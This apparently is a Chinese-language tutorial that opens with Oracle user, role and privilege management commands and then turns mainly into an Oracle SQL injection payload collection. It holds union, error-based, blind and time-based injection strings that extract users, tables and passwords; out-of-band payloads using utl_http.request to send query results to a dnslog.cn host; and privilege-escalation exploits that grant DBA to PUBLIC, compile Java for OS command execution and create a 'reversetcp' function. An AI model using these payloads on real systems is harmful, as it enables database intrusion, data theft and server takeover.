-- 系统权限授予命令:<br> 系统权限只能由DBA用户授出,也就是sys,system(这两个用户是最开始的两个DBA用户)<br> 授权命令:grant connect, resource, dba to username1 , username2...;<br> 普通用户通过授权可以具有与system相同的用户权限,但永远不能达到与sys用户相同的权限,system用户的权限也可以被回收<br> 回收授权命令:revoke connect, resource, dba from system;<br><br>-- 查询用户拥有那些权限:<br> select * from dba_role_privs;<br> select * from dba_sys_privs;<br> select * from role_sys_privs;<br><br>-- 查询自己拥有那些系统权限<br> select * from session_privs;<br> <br>-- 删除用户<br> drop user [username] cascade; -- 加上cascade则将用户连同其创建的东西全部删除<br> <br>-- 系统权限传递<br> 增加 WITH ADMIN OPTION 选项,则得到的权限可以传递。<br> grant connect, resorce to user50 with admin option;<br> <br>-- 系统权限回收,只能由DBA用户回收<br> revoke connect, resource, dba from system;<br> <br>-- 说明<br> 1. 如果使用WITH ADMIN OPTION为某个用户授予系统权限,那么对于被这个用户授予相同权限的所有用户来说,取消该用户的系统权限并不会级联取消这些用户的相同权限。<br> 2. 系统权限无级联,即A授予B权限,B授予C权限,如果A收回B的权限,C的权限不受影响;系统权限可以跨用户回收,即A可以直接收回C用户的权限。
复制代码
实体权限管理
实体权限:某种权限用户对其它用户的表或视图的存取权限。(是针对表或视图而言的)。
select, update, insert, alter, index, delete, all //all 包括所有权限
execute // 执行存储过程权限
-- 授权用户表操作<br> grant select, update, insert on product to user02;<br> grant all on product to user02;<br> 上述两条命令是 除drop之外所有对 product表的操作授予 user02 用户<br> <br>-- 授予全部用户表的操作权限<br> grant all on product to public; # all不包括 drop 权限<br> <br>-- 实体权限传递<br> grant select, update on product to user02 with grant option;<br> user02得到权限,并可以传递。<br> <br>-- 实体权限的回收<br> Revoke select, update on product from user02;<br> 传递的权限将全部消失<br><br>-- 说明<br> 1. 如果取消某个用户的对象权限,那么对于这个用户使用WITH GRANT OPTION授予权限的用户来说,同样还会取消这些用户的相同权限,也就是说取消授权时级联的。
复制代码
角色管理
-- 建立一个角色<br> create role role1;<br> <br>-- 为角色授权<br> grant create any table,create procedure to role1;<br> <br>-- 授权角色给用户<br> grant role1 to user1;<br> <br>-- 查看角色所包含的权限<br> select * from role_sys_privs;<br> <br>-- 创建带有口令的角色(在生效带有口令的角色时必须提供口令)<br> create role role1 identified by password1;<br> <br>-- 修改角色,设置是否需要口令<br> alter role role1 not identified;<br> alter role role1 identified by password1;<br><br>-- 设置当前用户要生效的角色<br> 角色的生效是一个什么概念呢?假设用户a有b1,b2,b3三个角色,那么如果b1未生效,则b1所包含的权限对于a来讲是不拥有的,只有角色生效了,角色内的权限才作用于用户,最大可生效角色数由参数MAX_ENABLED_ROLES设定;在用户登录后,oracle将所有直接赋给用户的权限和用户默认角色中的权限赋给用户。<br> set role role1; # 使role1生效<br> set role role,role2; # 使role1,role2生效<br> set role role1 identified by password1; # 使用带有口令的role1生效<br> set role all; # 使用该用户的所有角色生效<br> set role none; # 设置所有角色失效<br> set role all except role1; # 除role1外的该用户的所有其它角色生效。<br> select * from SESSION_ROLES; # 查看当前用户的生效的角色。<br> <br>-- 修改指定用户,设置其默认角色<br> alter user user1 default role role1;<br> alter user user1 default role all except role1;<br> <br>-- 删除角色<br> drop role role1;<br> 角色删除后,原来拥用该角色的用户就不再拥有该角色了,相应的权限也就没有了。<br> <br>-- 说明<br> 1. 无法使用WITH GRANT OPTION为角色授予对象权限<br> 2. 可以使用WITH ADMIN OPTION 为角色授予系统权限,取消时不是级联
# 判断注入点<br>所有数据库方式都一样<br><br># 判断列数<br>依旧提交 order by 去猜测显示当前页面所用的 SQL 查询了多少个字段,也就是确认查询字段数。<br>?id=1 order by 3 --+<br>?id=1 order by 4 --+<br><br># 判断回显点<br>?id=-1 union select null,null,null from dual --+<br>?id=-1 union select 1,'2','3' from dual --+<br><br># 获取数据库基本信息<br>?id=-1 union select 1,(select banner from sys.v_$version where rownum=1 ),'3' from dual --+<br>?id=-1 union select 1,(select instance_name from v_$instance),'3' from dual --+<br><br># 获取数据库名,即用户名<br>Oracle 没有数据库名的概念,所谓数据库名,即数据表的拥有者,也就是用户名。<br>1. 获取第一个用户名<br>?id=-1 union select 1,(select username from all_users where rownum=1),'3' from dual --+<br>2. 获取第二个用户名<br>?id=-1 union select 1,(select username from all_users where rownum=1 and username not in ('SYS')),'3' from dual --+<br> <br>3. 获取当前用户名<br>?id=-1 union select 1,(SELECT user FROM dual),'3' from dual --+<br><br># 获取表名<br>1. 获取Test用户第一张表<br>?id=-1 union select 1,(select table_name from all_tables where rownum=1 and owner='TEST'),'3' from dual --+<br>2. 获取Test用户第二张表<br>?id=-1 union select 1,(select table_name from all_tables where rownum=1 and owner='TEST' and table_name<>'NEWS'),'3' from dual --+<br><br># 获取字段名<br>?id=-1 union select 1,(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1),'3' from dual --+<br>?id=-1 union select 1,(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1 and column_name<>'ID'),'3' from dual --+<br><br># 获取数据<br>?id=-1 union select 1,(select concat(concat(username,'~~'),password) from users where rownum=1),null from dual --+
utl_inaddr.get_host_address 本意是获取 ip 地址,但是如果传递参数无法得到解析就会返回一个 oracle 错误并显示传递的参数。
我们传递的是一个 sql 语句所以返回的就是语句执行的结果。oracle 在启动之后,把一些系统变量都放置到一些特定的视图当中,可以利用这些视图获得想要的东西。
# 获取用户名<br>?id=1 and 1=utl_inaddr.get_host_name('~'%7c%7c(select user from dual)%7c%7c'~') --+<br><br># 获取表名<br>?id=1 and 1=utl_inaddr.get_host_name('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') --+<br><br># 获取字段名<br>?id=1 and 1=utl_inaddr.get_host_name('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') --+<br><br># 获取数据<br>?id=1 and 1=utl_inaddr.get_host_name('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') --+
复制代码
ctxsys.drithsx.sn ()
# 获取用户名<br>?id=1 and 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select user from dual)%7c%7c'~') --+<br><br># 获取表名<br>?id=1 and 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') --+<br><br># 获取字段名<br>?id=1 and 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') --+<br><br># 获取数据<br>?id=1 and 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') --+<br>
复制代码
dbms_xdb_version.checkin ()
# 获取用户名<br>?id=1 and (select dbms_xdb_version.checkin('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+<br><br># 获取表名<br>?id=1 and (select dbms_xdb_version.checkin('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+<br><br># 获取字段名<br>?id=1 and (select dbms_xdb_version.checkin('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+<br><br># 获取数据<br>?id=1 and (select dbms_xdb_version.checkin('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+
复制代码
dbms_xdb_version.makeversioned ()
# 获取用户名<br>http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.makeversioned('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+<br><br># 获取表名<br>http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.makeversioned('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+<br><br># 获取字段名<br>http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.makeversioned('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+<br><br># 获取数据<br>http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.makeversioned('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+
复制代码
dbms_xdb_version.uncheckout ()
# 获取用户名<br>http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.uncheckout('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+<br><br># 获取表名<br>http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.uncheckout('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+<br><br># 获取字段名<br>http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.uncheckout('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+<br><br># 获取数据<br>http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.uncheckout('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+
复制代码
dbms_utility.sqlid_to_sqlhash ()
# 获取用户名<br>http://hackrock.com:8080/oracle/?id=1 and (select dbms_utility.sqlid_to_sqlhash('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+<br><br># 获取表名<br>http://hackrock.com:8080/oracle/?id=1 and (select dbms_utility.sqlid_to_sqlhash('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+<br><br># 获取字段名<br>http://hackrock.com:8080/oracle/?id=1 and (select dbms_utility.sqlid_to_sqlhash('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+<br><br># 获取数据<br>http://hackrock.com:8080/oracle/?id=1 and (select dbms_utility.sqlid_to_sqlhash('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+
复制代码
ordsys.ord_dicom.getmappingxpath ()
# 获取用户名<br>http://hackrock.com:8080/oracle/?id=1 and (select ordsys.ord_dicom.getmappingxpath('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+<br><br># 获取表名<br>http://hackrock.com:8080/oracle/?id=1 and (select ordsys.ord_dicom.getmappingxpath('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+<br><br># 获取字段名<br>http://hackrock.com:8080/oracle/?id=1 and (select ordsys.ord_dicom.getmappingxpath('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+<br><br># 获取数据<br>http://hackrock.com:8080/oracle/?id=1 and (select ordsys.ord_dicom.getmappingxpath('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+
复制代码
XMLType ()
# 获取用户名<br>http://hackrock.com:8080/oracle/?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null --+<br><br># 获取表名<br>http://hackrock.com:8080/oracle/?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7cchr(62))) from dual) is not null --+<br><br># 获取字段名<br>http://hackrock.com:8080/oracle/?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7cchr(62))) from dual) is not null --+<br><br># 获取数据<br>http://hackrock.com:8080/oracle/?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select username from test.users where rownum=1)%7c%7cchr(62))) from dual) is not null --+
# 判断是否是TEST用户<br>?id=1 and 1=(select decode(user,'TEST',1,0) from dual) --+<br><br># 猜解当前用户<br>?id=1 and 1=(select decode(substr((select user from dual),1,1),'a',1,0) from dual) --+<br><br># 猜解表名<br>?id=1 and 1=(select decode(substr((select table_name from all_tables where rownum=1 and owner='TEST'),1,1),'N',1,0) from dual) --+<br><br># 猜解字段名<br>?id=1 and 1=(select decode(substr((select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1),1,1),'I',1,0) from dual) --+<br><br># 猜解数据<br>?id=1 and 1=(select decode(substr((select username from test.users where rownum=1),1,1),'a',1,0) from dual) --+
复制代码
instr ()
instr 函数的使用,从一个字符串中查找指定子串的位置
select instr('123456789','12') position from dual;
?id=1 and (instr((select user from dual),'S'))=1 --+<br>?id=1 and (instr((select user from dual),'SY'))=1 --+<br>?id=1 and (instr((select user from dual),'SYS'))=1 --+
复制代码
substr()
这个就和mysql 基本一致
# 猜解数据长度<br>?id=1 and (select length(user) from dual)=3 --+<br><br># ASCII按位爆破<br>?id=1 and (select ascii(substr(user,1,1))from dual)=65 --+
# 查看是否可以使用 dbms_pipe.receive_message () 函数进行延时注入<br>?id=1 and 1=(dbms_pipe.receive_message('RDS',5)) --+<br><br># 猜解当前用户<br>?id=1 and 7238=(case when (ascii(substrc((select nvl(cast(user as varchar(4000)),chr(32)) from dual),1,1)) > 65) then dbms_pipe.receive_message(chr(32)%7c%7cchr(106)%7c%7cchr(72)%7c%7cchr(73),5) else 7238 end) --+<br><br># 猜解表名<br>?id=1 and 7238=(case when (ascii(substrc((select nvl(cast(table_name as varchar(4000)),chr(32)) from all_tables where rownum=1 and owner='TEST'),1,1)) > 65) then dbms_pipe.receive_message(chr(32)%7c%7cchr(106)%7c%7cchr(72)%7c%7cchr(73),5) else 7238 end) --+<br><br># 猜解字段<br>?id=1 and 7238=(case when (ascii(substrc((select nvl(cast(column_name as varchar(4000)),chr(32)) from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1),1,1)) > 65) then dbms_pipe.receive_message(chr(32)%7c%7cchr(106)%7c%7cchr(72)%7c%7cchr(73),5) else 7238 end) --+<br><br># 猜解数据<br>?id=1 and 7238=(case when (ascii(substrc((select nvl(cast(username as varchar(4000)),chr(32)) from test.users where rownum=1),1,1)) > 65) then dbms_pipe.receive_message(chr(32)%7c%7cchr(106)%7c%7cchr(72)%7c%7cchr(73),5) else 7238 end) --+
复制代码
decode ()
原理:结合耗费时间的查询语句,不过在使用的过程中有很多不尽如人意的地方,有时候加载快有时加载慢。
?id=1 and 1=(select decode(substr(user,1,1),'S',(select count(*) from all_objects),0) from dual) --+
复制代码
decode () 与 dbms_pipe.receive_message () 嵌套时间盲注
?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS', 5),0) from dual) --+
复制代码
DNS外带注入
Oracle 注入之带外通信和 DNSLOG 注入非常相似,例如和 mysql 中 load_file () 函数实现无回显注入非常相似。
Oracle 发送 HTTP 和 DNS 请求,并将查询结果带到请求中,然后检测外网服务器的 HTTP 和 DNS 日志,从日志中获取查询结果,通过这种方式将繁琐的盲注转换成可以直接获取查询结果的方式。
使用第三方平台,监听访问请求,并记录请求的日志信息,然后使用 utl_http.request() 向外网主机发送 http 请求,请求便携带了查询的结果信息。此处可以结合 SSRF 进行内网探测。或许这就是 Oracle 的 SSRF。
利用 utl.inaddr.get_host_address(),将查询结果拼接到域名下,并使用 DNS 记录解析日志,通过这种方式获取查询结果。
# 检测是否支持 utl_http.request<br>?id=1 and exists (select count(*) from all_objects where object_name='UTL_HTTP') --+<br><br># 获取用户名<br>?id=1 and utl_http.request('http://'%7c%7c(select user from dual)%7c%7c'.z9mt3s.dnslog.cn/oracle')=1--+<br><br># 获取表名<br>?id=1 and utl_http.request('http://'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'.z9mt3s.dnslog.cn/oracle')=1--+<br><br># 获取列名<br>?id=1 and utl_http.request('http://'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'.z9mt3s.dnslog.cn/oracle')=1--+<br><br># 获取数据<br>?id=1 and utl_http.request('http://'%7c%7c(select username from test.users where rownum=1)%7c%7c'.z9mt3s.dnslog.cn/oracle')=1--+
复制代码
利用漏洞提权命令执行
dbms_export_extension()
影响版本:Oracle 8.1.7.4, 9.2.0.1-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2, XE (Fixed in CPU July 2006)
该请求将导致查询 "GRANT DBA TO PUBLIC" 以 SYS 身份执行。因为这个函数允许 PL / SQL 缺陷(PL / SQL 注入)。一旦这个请求成功执行,PUBLIC 获取 DBA 角色,从而提升当前 user 的特权
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0) from dual
复制代码
使用Java执行
# 创建java库<br>select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args){try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual<br><br># 赋予Java权限<br>select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''<>'''''''', ''''''''execute'''''''');end;'''';END;'';END;--','SYS',0,'1',0) from dual<br><br># 创建函数<br>select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';'''';END;'';END;--','SYS',0,'1',0) from dual<br><br># 赋予函数执行权限<br>select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual<br><br># 执行系统命令<br>select sys.LinxRunCMD('/bin/bash -c /usr/bin/whoami') from dual
复制代码
dbms_xmlquery.newcontext()
影响版本:Oracle 8.1.7.4, 9.2.0.1-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2, XE (Fixed in CPU July 2006)
必须在 DBMS_PORT_EXTENSION 存在漏洞情况下,否则赋予权限时无法成功
# 创建java库<br>select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;<br><br># 赋予当前用户Java权限<br>select user from dual<br>select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''YY'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''<>'''''''', ''''''''execute'''''''');end;'''';END;'';END;--','SYS',0,'1',0) from dual;<br><br># 查看 all_objects 内部改变<br>select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'<br><br># 创建函数<br>select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;<br><br># 判断是否创建成功<br>select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'<br><br># 执行命令<br>select LinxRunCMD('id') from dual<br><br># 删除函数<br>drop function LinxRunCMD
复制代码
dbms_java_test.funcall()
影响版本:10g R2, 11g R1, 11g R2
权限:Java Permissions
Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','pwd > /tmp/pwd.txt') from dual;<br>执行会有一定报错,但是不影响命令执行
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
# 赋予函数执行权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on reversetcp to public'''';END;'';END;--','SYS',0,'1',0) from dual